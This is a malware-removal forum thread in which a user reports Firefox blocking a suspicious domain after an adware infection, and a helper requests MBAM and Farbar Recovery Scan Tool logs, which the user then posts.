Jump to content

Just removed some malware, but now I can't use firefox because of some other


Recommended Posts

Sorry for the  title, I couldn't really come up with anything better without making it super long. 

Hey, Im Eirixoto. 

Today, after running a Avast startup scan, I randomly had some malware on my browsers (Ironic, huh.). It would show this icon thing on the right side of my screen on some websites and every time I opened a website spam me with popups (Which got blocked by Firefox tho, I just got the message saying "Firefox has blocked X popups"). I believe I managed to remove this when I ran Malwarebytes and some cleaner. 

However, now whenever I start Mozilla Firefox, I get this popup saying its blocking "m55.dnsqa.me". It also uses a looong time to start, its just white for a really long time before anything happens.
http://i.imgur.com/8kPzyQ7.png
Some other site also got blocked, but I don't remember what it was called. 

For the record: Right before this happened, I uninstalled League of Legends. I installed the new Runescape NXT client not long ago. I then ran the Avast startup scan. I've uninstalled both Firefox and Chrome multiple times by now. I also uninstalled some "Visual C++ Redistributable packages", but realized that was not smart and I believe I've reinstalled all of those now. 

If more info is needed, please, tell me. I understand that Im writing this... hard to understand, sorry about that. This is really annoying as I can't use Firefox at all because of this popup .

Link to post
Share on other sites

Hello Eirixoto, welcome to Malwarebytes' Malware Removal forum!
 
My name is Adam. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that. :)
 
General P2P/Piracy Notice: 
 

If you are using Peer to Peer (P2P) filesharing software such as uTorrent, BitTorrent or similar you must either fully uninstall or completely disable the programme(s) from running whilst receiving assistance at this forum. 
Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.
If you have illegal/cracked/keygen or similar software on the computer, please remove/uninstall the software now and read the policy on Piracy. Failure to do so will also result in your topic being closed.

 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Ensure you read through my instructions thoroughly, and carry out each step in the order specified.
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability in providing the best set of instructions for you.
  • Please backup important files before proceeding with my instructions. Malware removal can be unpredictable at times.   
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before proceeding.
  • Topics are locked if no response is made after 4 days. Please inform me if you require additional time to complete my instructions.
  • I will notify you when I believe your computer is free of malware. Please bear in mind, absence of symptoms does not necessarily correlate to absence of malware, so please wait until the "All Clean". 
  • Ensure you are following this topic. Click etYzdbu.png at the top of the page. 

======================================================
 
Please run the following scans so I can ascertain the state of your computer.
 
STEP 1
GfiJrQ9.png Malwarebytes Anti-Malware (MBAM)

  • Open Malwarebytes Anti-Malware and click Update Now.
  • Once updated, click the Settings tab, followed by Detection and Protection and tick Scan for rootkits.
  • Click the Scan tab, ensure Threat Scan is selected and click Start Scan.
  • Note: You may see the following message, "Could not load DDA driver". Click Yes, allow your PC to reboot and continue afterwards. 
  • If threats are detected, click Remove Selected. If you are prompted to reboot, click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • Click Copy to Clipboard and paste the log in your next reply. 

 
STEP 2

xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Scan

  • Please download Farbar Recovery Scan Tool (x32) or Farbar Recovery Scan Tool (x64) and save the file to your Desktop.
  • Note: Download and run the version compatible with your system (32 or 64-bit). Download both if you're unsure; only one will run.
  • Right-Click FRST.exe or FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 
     

======================================================
 
STEP 3
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • MBAM log
  • FRST.txt
  • Addition.txt
Link to post
Share on other sites

Hello, Adam. Thanks for the fast reply.
Please, call me Eirik.

For the record I don’t have any torrent programs. I believe there is no illegally obtained softwares either. If there is, however, and you see that from some logs or what not, tell me and I'll get rid of it. 

 

As I’ve already ran Malwarebytes Anti-Malware a few times already today, it didn’t find anything more this time. It did delete like 29 objects earlier, I dunno if that will show up on the new scan logs? If you do want some of the old, tell me.
Anyways, heres the logs from Malwarebytes Anti-Malware.
 

 

Malwarebytes Anti-Malware

www.malwarebytes.org

 

Skannedato: 21-Feb-16

Skannetid: 15:59

Loggfil:

Administrator: Ja

 

Versjon: 2.2.0.1024

Malwaredatabase: v2016.02.21.02

Rootkitdatabase: v2016.02.17.01

Lisens: Prøveversjon

Malwarebeskyttelse: Aktivert

Ondsinnet Nettsidebeskyttelse: Aktivert

Selvbeskyttelse: Deaktivert

 

OS: Windows 8.1

CPU: x64

Filsystem: NTFS

Bruker: Eirik

 

Skannetype: Trusselskann

Resultat: Fullført

Objekter skannet: 374676

Tid brukt: 52 min, 33 sek

 

Minne: Aktivert

Oppstart: Aktivert

Filsystem: Aktivert

Arkiv: Aktivert

Rootkits: Aktivert

Heuristikk: Aktivert

PUP: Aktivert

PUM: Aktivert

 

Prosesser: 0

(Ingen ondsinnede elementer funnet)

 

Moduler: 0

(Ingen ondsinnede elementer funnet)

 

Registernøkler: 0

(Ingen ondsinnede elementer funnet)

 

Registerverdier: 0

(Ingen ondsinnede elementer funnet)

 

Registerdata: 0

(Ingen ondsinnede elementer funnet)

 

Mapper: 0

(Ingen ondsinnede elementer funnet)

 

Filer: 0

(Ingen ondsinnede elementer funnet)

 

Fysiske sektorer: 0

(Ingen ondsinnede elementer funnet)

 

 

(end)

 

FRST.txt
 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:21-02-2016

Ran by Eirik (administrator) on NINJA (21-02-2016 17:14:18)
Running from C:\Users\Eirik\Desktop
Loaded Profiles: Eirik (Available Profiles: Eirik)
Platform: Windows 8.1 0(X64) Language: Norsk, bokmål (Norge)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\SCM\MSIService.exe
(MSI) C:\Program Files (x86)\MSI\Super-Charger\ChargeService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\integratedoffice.exe
() C:\Program Files\Qualcomm Atheros\Killer Network Manager\BFNService.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
(Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
() C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
(MSI) C:\Program Files (x86)\SCM\Radio Manager.exe
(MSI) C:\Program Files (x86)\SCM\SCM.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Spotify Ltd) C:\Users\Eirik\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Dropbox, Inc.) C:\Users\Eirik\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\MSI\KLM\KLM.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Sound Blaster Cinema\Sound Blaster Cinema\SBCinema.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(MSI) C:\Program Files (x86)\MSI\Super-Charger\Super-Charger.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-Agent.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\livecomm.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\WWAHost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.17709_none_fa7932f59afc2e40\TiWorker.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13513288 2013-04-24] (Realtek Semiconductor)
HKLM\...\Run: [iAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [286704 2013-03-22] (Intel Corporation)
HKLM\...\Run: [Radio Manager] => C:\Program Files (x86)\SCM\Radio Manager.exe [406920 2013-04-18] (MSI)
HKLM\...\Run: [sCM] => C:\Program Files (x86)\SCM\SCM.exe [407968 2013-04-18] (MSI)
HKLM\...\Run: [MBCfg64] => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\MBCfg64.dll,RunDLLEntry MBCfg64
HKLM\...\Run: [igfxTray] => C:\Windows\system32\igfxtray.exe [455784 2014-09-05] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [shadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-12] (NVIDIA Corporation)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [15033976 2015-11-20] (Logitech Inc.)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2773232 2015-12-01] (Synaptics Incorporated)
HKLM-x32\...\Run: [KLM] => C:\Program Files (x86)\MSI\KLM\KLM.exe [1564040 2013-04-22] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [sound Blaster Cinema] => C:\Program Files (x86)\Creative\Sound Blaster Cinema\Sound Blaster Cinema\SBCinema.exe [711680 2012-11-29] (Creative Technology Ltd)
HKLM-x32\...\Run: [updReg] => C:\Windows\UpdReg.EXE
HKLM-x32\...\Run: [super-Charger] => C:\Program Files (x86)\MSI\Super-Charger\Super-Charger.exe [490480 2013-02-07] (MSI)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-29] (CyberLink Corp.)
HKLM-x32\...\Run: [blueStacks Agent] => c:\Program Files (x86)\BlueStacks\HD-Agent.exe [597880 2013-01-07] (BlueStack Systems, Inc.)
HKLM-x32\...\Run: [switchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5565448 2015-11-12] (LogMeIn Inc.)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7021880 2016-01-20] (AVAST Software)
HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
HKLM\...\Policies\Explorer\Run: [btvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-02-26] (Atheros Communications)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [Dropbox Update] => C:\Users\Eirik\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-18] (Dropbox, Inc.)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [spotify Web Helper] => C:\Users\Eirik\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2016-01-25] (Spotify Ltd)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [175368 2016-01-23] (NVIDIA Corporation)
AppInit_DLLs: , C:\WINDOWS\system32\nvinitx.dll => C:\WINDOWS\system32\nvinitx.dll [175368 2016-01-23] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\WINDOWS\SysWOW64\nvinit.dll => C:\WINDOWS\SysWOW64\nvinit.dll [153392 2016-01-23] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-01-20] (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-17] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-17] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-17] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Qualcomm Atheros Killer Network Manager.lnk [2013-04-24]
ShortcutTarget: Qualcomm Atheros Killer Network Manager.lnk -> C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe ()
Startup: C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2016-02-18]
ShortcutTarget: Dropbox.lnk -> C:\Users\Eirik\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 193.213.112.4 130.67.15.198
Tcpip\..\Interfaces\{37BFE48D-77CD-419D-8D47-2C194E38046A}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{9DBBD578-1F2D-49B3-AF19-9BA3EA7169DF}: [DhcpNameServer] 193.213.112.4 130.67.15.198
Tcpip\..\Interfaces\{C9B14333-EC8D-4272-ADBE-4ED48828BBD5}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{E9A4C058-84BB-4E14-81B1-3108B7D371F9}: [DhcpNameServer] 82.163.143.171
 
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=AV01
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.msn.com/?pc=AV01
SearchScopes: HKLM -> DefaultScope {C20F2EF6-44CE-4E46-8912-DE1A7605CD4B} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKLM-x32 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKU\S-1-5-21-730552332-2537374774-3045828507-1002 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
SearchScopes: HKU\S-1-5-21-730552332-2537374774-3045828507-1002 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-02-17] (Microsoft Corporation)
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2013-02-26] (Qualcomm Atheros Commnucations)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-01-20] (AVAST Software)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2016-02-17] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-02-17] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-02-17] (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-13] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-01-20] (AVAST Software)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2016-02-17] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-17] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-13] (Oracle Corporation)
Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-02-17] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\Eirik\AppData\Roaming\Mozilla\Firefox\Profiles\ftitlze4.default-1456024844607
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-10] ()
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-10] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.0.72 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-03-12] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-03-12] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-13] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-13] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-02-17] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2016-02-17] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-13] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-01-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-01-23] (NVIDIA Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-21] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-21] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-01-21] (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Eirik\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-01-23] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-01-22]
